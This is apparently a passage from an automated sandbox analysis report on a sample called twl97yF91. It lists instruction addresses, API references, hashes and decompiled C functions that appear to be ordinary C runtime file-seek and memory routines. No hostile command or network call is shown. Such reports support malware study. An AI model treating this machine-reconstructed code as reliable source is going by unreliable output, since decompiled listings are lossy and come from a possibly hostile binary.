                                                                                                                                                                                                          0x0040c8d8
                                                                                                                                                                                                          0x0040c8de
                                                                                                                                                                                                          0x0040c8de
                                                                                                                                                                                                          0x0040c8e0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8e0
                                                                                                                                                                                                          0x0040c824
                                                                                                                                                                                                          0x0040c827
                                                                                                                                                                                                          0x0040c829
                                                                                                                                                                                                          0x0040c843
                                                                                                                                                                                                          0x0040c84a
                                                                                                                                                                                                          0x0040c84f
                                                                                                                                                                                                          0x0040c852
                                                                                                                                                                                                          0x0040c857
                                                                                                                                                                                                          0x0040c8d2
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8d5
                                                                                                                                                                                                          0x0040c859
                                                                                                                                                                                                          0x0040c85b
                                                                                                                                                                                                          0x0040c85d
                                                                                                                                                                                                          0x0040c868
                                                                                                                                                                                                          0x0040c86b
                                                                                                                                                                                                          0x0040c88d
                                                                                                                                                                                                          0x0040c88f
                                                                                                                                                                                                          0x0040c892
                                                                                                                                                                                                          0x0040c895
                                                                                                                                                                                                          0x0040c89d
                                                                                                                                                                                                          0x0040c89f
                                                                                                                                                                                                          0x0040c8a6
                                                                                                                                                                                                          0x0040c8ab
                                                                                                                                                                                                          0x0040c8ae
                                                                                                                                                                                                          0x0040c8c0
                                                                                                                                                                                                          0x0040c8c0
                                                                                                                                                                                                          0x0040c8c3
                                                                                                                                                                                                          0x0040c8c3
                                                                                                                                                                                                          0x0040c8c8
                                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x0040c8cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8cd
                                                                                                                                                                                                          0x0040c8b0
                                                                                                                                                                                                          0x0040c8b3
                                                                                                                                                                                                          0x0040c8b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8b8
                                                                                                                                                                                                          0x0040c8be
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8be
                                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c8a1
                                                                                                                                                                                                          0x0040c86d
                                                                                                                                                                                                          0x0040c873
                                                                                                                                                                                                          0x0040c880
                                                                                                                                                                                                          0x0040c880
                                                                                                                                                                                                          0x0040c882
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c877
                                                                                                                                                                                                          0x0040c87a
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                                          0x0040c80a
                                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                                          0x0040c7ce
                                                                                                                                                                                                          0x0040c7d8
                                                                                                                                                                                                          0x0040c7db
                                                                                                                                                                                                          0x0040c7e0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7e2
                                                                                                                                                                                                          0x0040c7e4
                                                                                                                                                                                                          0x0040c7e6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7e8
                                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                                          0x0040c7ed
                                                                                                                                                                                                          0x0040c7ef
                                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                                          0x0040c7f4
                                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040c7ab
                                                                                                                                                                                                          0x0040c79e
                                                                                                                                                                                                          0x0040c75b
                                                                                                                                                                                                          0x0040c760
                                                                                                                                                                                                          0x0040c761
                                                                                                                                                                                                          0x0040c762
                                                                                                                                                                                                          0x0040c763
                                                                                                                                                                                                          0x0040c764
                                                                                                                                                                                                          0x0040c765
                                                                                                                                                                                                          0x0040c76b
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2395185920-0
                                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _fseek_malloc_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 208892515-0
                                                                                                                                                                                                          • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                          • Instruction ID: 2e24b71a3686789743fa28f5375901659d2b540135881608da43852a023a1963
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E441C772600B114AD732863EF904797B3EAEFC0358F240A2DE996827D0E771E545CB95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1291973410-0
                                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction ID: 466754a198f17fa106bca301e87fc8bc85fda25ca3c3beb12df5f5021220c674
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5041B031A00688AFDB269F6988805EEF7B6EFC0728F248629EC5597154E774DE40CB40
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                          			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                          				signed int* _t53;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t54 = __ebp;
                                                                                                                                                                                                          				_t45 = __edx;
                                                                                                                                                                                                          				_t42 = __ebx;
                                                                                                                                                                                                          				_t53 = _a4;
                                                                                                                                                                                                          				if(_t53 == 0) {
                                                                                                                                                                                                          					L40:
                                                                                                                                                                                                          					_t31 = _t30 | 0xffffffff;
                                                                                                                                                                                                          					__eflags = _t31;
                                                                                                                                                                                                          					return _t31;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t43 = _a12;
                                                                                                                                                                                                          					if(_t43 == 2) {
                                                                                                                                                                                                          						goto L40;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t30 = _t53[0xe];
                                                                                                                                                                                                          						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                          							goto L40;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t48 = _a8;
                                                                                                                                                                                                          							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                          								__eflags = _t43 - 1;
                                                                                                                                                                                                          								if(_t43 == 1) {
                                                                                                                                                                                                          									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                          									__eflags = _t48;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t48;
                                                                                                                                                                                                          								if(_t48 < 0) {
                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags = _t53[0x16];
                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                          										_t33 = _t53[0x1a];
                                                                                                                                                                                                          										__eflags = _t48 - _t33;
                                                                                                                                                                                                          										if(_t48 < _t33) {
                                                                                                                                                                                                          											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                          											_t55 = _t55 + 4;
                                                                                                                                                                                                          											__eflags = _t30;
                                                                                                                                                                                                          											if(_t30 < 0) {
                                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L27;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t48 = _t48 - _t33;
                                                                                                                                                                                                          											L27:
                                                                                                                                                                                                          											__eflags = _t48;
                                                                                                                                                                                                          											if(_t48 == 0) {
                                                                                                                                                                                                          												L38:
                                                                                                                                                                                                          												return _t53[0x1a];
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eflags = _t53[0x12];
                                                                                                                                                                                                          												if(_t53[0x12] != 0) {
                                                                                                                                                                                                          													L30:
                                                                                                                                                                                                          													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                          													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                          														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                          														_t48 = _t48 - 1;
                                                                                                                                                                                                          														__eflags = _t53[0x1c];
                                                                                                                                                                                                          														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                          														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                          															_t53[0xe] = 1;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t48;
                                                                                                                                                                                                          													if(_t48 <= 0) {
                                                                                                                                                                                                          														goto L38;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														while(1) {
                                                                                                                                                                                                          															_t35 = 0x4000;
                                                                                                                                                                                                          															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                          															if(_t48 < 0x4000) {
                                                                                                                                                                                                          																_t35 = _t48;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                          															_t55 = _t55 + 0xc;
                                                                                                                                                                                                          															__eflags = _t30;
                                                                                                                                                                                                          															if(_t30 <= 0) {
                                                                                                                                                                                                          																goto L39;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															_t48 = _t48 - _t30;
                                                                                                                                                                                                          															__eflags = _t48;
                                                                                                                                                                                                          															if(_t48 > 0) {
                                                                                                                                                                                                          																continue;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																goto L38;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															goto L41;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                          													_t55 = _t55 + 4;
                                                                                                                                                                                                          													_t53[0x12] = _t30;
                                                                                                                                                                                                          													__eflags = _t30;
                                                                                                                                                                                                          													if(_t30 == 0) {
                                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_push(0);
                                                                                                                                                                                                          										_push(_t48);
                                                                                                                                                                                                          										_push(_t53[0x10]);
                                                                                                                                                                                                          										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                          										_t53[1] = 0;
                                                                                                                                                                                                          										 *_t53 = _t53[0x11];
                                                                                                                                                                                                          										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                          										__eflags = _t30;
                                                                                                                                                                                                          										if(_t30 < 0) {
                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t53[0x1a] = _t48;
                                                                                                                                                                                                          											_t53[0x19] = _t48;
                                                                                                                                                                                                          											return _t48;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(_t43 == 0) {
                                                                                                                                                                                                          									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_t48 < 0) {
                                                                                                                                                                                                          									L39:
                                                                                                                                                                                                          									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                          									__eflags = _t32;
                                                                                                                                                                                                          									return _t32;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									if(_t53[0x11] != 0) {
                                                                                                                                                                                                          										L11:
                                                                                                                                                                                                          										if(_t48 <= 0) {
                                                                                                                                                                                                          											L17:
                                                                                                                                                                                                          											return _t53[0x19];
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												_t39 = 0x4000;
                                                                                                                                                                                                          												if(_t48 < 0x4000) {
                                                                                                                                                                                                          													_t39 = _t48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                          												_t55 = _t55 + 0xc;
                                                                                                                                                                                                          												if(_t30 == 0) {
                                                                                                                                                                                                          													goto L39;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t48 = _t48 - _t30;
                                                                                                                                                                                                          												if(_t48 > 0) {
                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													goto L17;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                          										_t57 = _t55 + 4;
                                                                                                                                                                                                          										_t53[0x11] = _t30;
                                                                                                                                                                                                          										if(_t30 == 0) {
                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                                          											_t55 = _t57 + 0xc;
                                                                                                                                                                                                          											goto L11;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L41:
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x00405d00
                                                                                                                                                                                                          0x00405d00
                                                                                                                                                                                                          0x00405d00
                                                                                                                                                                                                          0x00405d01
                                                                                                                                                                                                          0x00405d07
                                                                                                                                                                                                          0x00405e7f
                                                                                                                                                                                                          0x00405e7f
                                                                                                                                                                                                          0x00405e7f
                                                                                                                                                                                                          0x00405e83
                                                                                                                                                                                                          0x00405d0d
                                                                                                                                                                                                          0x00405d0d
                                                                                                                                                                                                          0x00405d14
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d1a
                                                                                                                                                                                                          0x00405d1a
                                                                                                                                                                                                          0x00405d20
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d2f
                                                                                                                                                                                                          0x00405d34
                                                                                                                                                                                                          0x00405d38
                                                                                                                                                                                                          0x00405dad
                                                                                                                                                                                                          0x00405db0
                                                                                                                                                                                                          0x00405db2
                                                                                                                                                                                                          0x00405db2
                                                                                                                                                                                                          0x00405db2
                                                                                                                                                                                                          0x00405db5
                                                                                                                                                                                                          0x00405db7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405dbd
                                                                                                                                                                                                          0x00405dbd
                                                                                                                                                                                                          0x00405dc1
                                                                                                                                                                                                          0x00405df8
                                                                                                                                                                                                          0x00405dfb
                                                                                                                                                                                                          0x00405dfd
                                                                                                                                                                                                          0x00405e04
                                                                                                                                                                                                          0x00405e09
                                                                                                                                                                                                          0x00405e0c
                                                                                                                                                                                                          0x00405e0e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                                          0x00405e73
                                                                                                                                                                                                          0x00405e78
                                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                                          0x00405e32
                                                                                                                                                                                                          0x00405e34
                                                                                                                                                                                                          0x00405e37
                                                                                                                                                                                                          0x00405e38
                                                                                                                                                                                                          0x00405e3c
                                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                                          0x00405e4c
                                                                                                                                                                                                          0x00405e4e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e55
                                                                                                                                                                                                          0x00405e57
                                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                                          0x00405e61
                                                                                                                                                                                                          0x00405e66
                                                                                                                                                                                                          0x00405e69
                                                                                                                                                                                                          0x00405e6b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e6d
                                                                                                                                                                                                          0x00405e6f
                                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                                          0x00405e1a
                                                                                                                                                                                                          0x00405e1f
                                                                                                                                                                                                          0x00405e24
                                                                                                                                                                                                          0x00405e27
                                                                                                                                                                                                          0x00405e2a
                                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                                          0x00405dc3
                                                                                                                                                                                                          0x00405dc9
                                                                                                                                                                                                          0x00405dcb
                                                                                                                                                                                                          0x00405dcc
                                                                                                                                                                                                          0x00405dcd
                                                                                                                                                                                                          0x00405dd4
                                                                                                                                                                                                          0x00405ddb
                                                                                                                                                                                                          0x00405ddd
                                                                                                                                                                                                          0x00405de5
                                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                                          0x00405df0
                                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                                          0x00405dc1
                                                                                                                                                                                                          0x00405d3a
                                                                                                                                                                                                          0x00405d3c
                                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                                          0x00405e79
                                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                                          0x00405e7e
                                                                                                                                                                                                          0x00405d49
                                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                                          0x00405d77
                                                                                                                                                                                                          0x00405d79
                                                                                                                                                                                                          0x00405da7
                                                                                                                                                                                                          0x00405dac
                                                                                                                                                                                                          0x00405d7b
                                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                                          0x00405d87
                                                                                                                                                                                                          0x00405d89
                                                                                                                                                                                                          0x00405d89
                                                                                                                                                                                                          0x00405d91
                                                                                                                                                                                                          0x00405d96
                                                                                                                                                                                                          0x00405d9b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405da1
                                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                                          0x00405d4f
                                                                                                                                                                                                          0x00405d54
                                                                                                                                                                                                          0x00405d59
                                                                                                                                                                                                          0x00405d5c
                                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d67
                                                                                                                                                                                                          0x00405d6f
                                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                                          0x00405d38
                                                                                                                                                                                                          0x00405d20
                                                                                                                                                                                                          0x00405d14
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _fseek_malloc_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 208892515-0
                                                                                                                                                                                                          • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                          • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                          			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                          				intOrPtr* _t61;
                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                          				signed int _t82;
                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                          				signed int _t88;
                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                          				signed int _t98;
                                                                                                                                                                                                          				signed int _t99;
                                                                                                                                                                                                          				intOrPtr* _t100;
                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t90 = __edx;
                                                                                                                                                                                                          				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t100 = _a16;
                                                                                                                                                                                                          					_t105 = _t100;
                                                                                                                                                                                                          					if(_t100 != 0) {
                                                                                                                                                                                                          						_t82 = _a4;
                                                                                                                                                                                                          						__eflags = _t82;
                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                          						_t90 = _t63 % _a8;
                                                                                                                                                                                                          						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                          						if(__eflags > 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t97 = _a8 * _a12;
                                                                                                                                                                                                          						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                          						_v8 = _t82;
